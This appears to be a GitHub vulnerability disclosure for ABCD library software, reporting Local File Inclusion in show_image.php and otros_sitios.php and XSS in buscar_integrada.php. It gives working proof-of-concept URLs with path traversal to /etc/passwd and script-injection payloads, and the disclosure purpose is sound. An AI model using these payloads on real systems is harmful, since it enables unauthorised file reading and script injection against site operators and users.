Local File Inclusion and XSS in ABCD Community

Vulnerable software: https://abcd-community.org/

https://github.com/ABCD-Community/development

There are two Local File Inclusion vulnerabilities in ABCD software:

show_image.php
otros_sitios.php

Examples:
www[.]XXXXX[.]com[.]br/common/show_image.php?image=../../../../../../../etc/passwd&base=arquivo
www[.]XXXXX[.]com[.]br/abcd/opac/php/otros_sitios.php?sitio=C:/Windows/debug/NetSetup.log&submenu=N

A XSS vulnerability was found in the Sub_Expresion parameter on buscar_integrada.php file:

www[.]XXXXX[.]com[.]br/buscar_integrada.php?alcance=&IR_A=&campo=Se%EF%BF%BD%EF%BF%BDo&LastKey=fdsfadsa&base=arquivo&Diccio=4-1&Sub_Expresion=%22fda%3Cinput%3E%3Cinput%3Esfdafds%22&Sub_Expresiones=&Navegacion=&Expresion=&Campos=TW_+~~~+REF_+~~~+DAL_+~~~+FUL_+~~~+SEC_+~~~+SPL_+~~~+GDL_&Operadores=and+~~~+and+~~~+and+~~~+and+~~~+and+~~~+and&modo=1B&llamado_desde=avanzada.php&lang=pt&resaltar=S&prefijo=SEC_&Opcion=buscar_diccionario&Seleccionados=%22fdsaf%22

www[.]XXXXXXX[.]com/opac/php/buscar_integrada.php?lang=pt&base=acervo&modo=1B&alcance=and&Opcion=libre&prefijo=TW_&Sub_Expresion=MG_00056fas%3Caudio%20src/onerror=alert(1)%3E

Name		Name	Last commit message	Last commit date
Latest commit History 8 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Local File Inclusion and XSS in ABCD Community

Vulnerable software: https://abcd-community.org/

About

Releases

Packages

peritocibernetico/ABCD_Vulnerabilities

Folders and files

Latest commit

History

Repository files navigation

Local File Inclusion and XSS in ABCD Community

Vulnerable software: https://abcd-community.org/

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages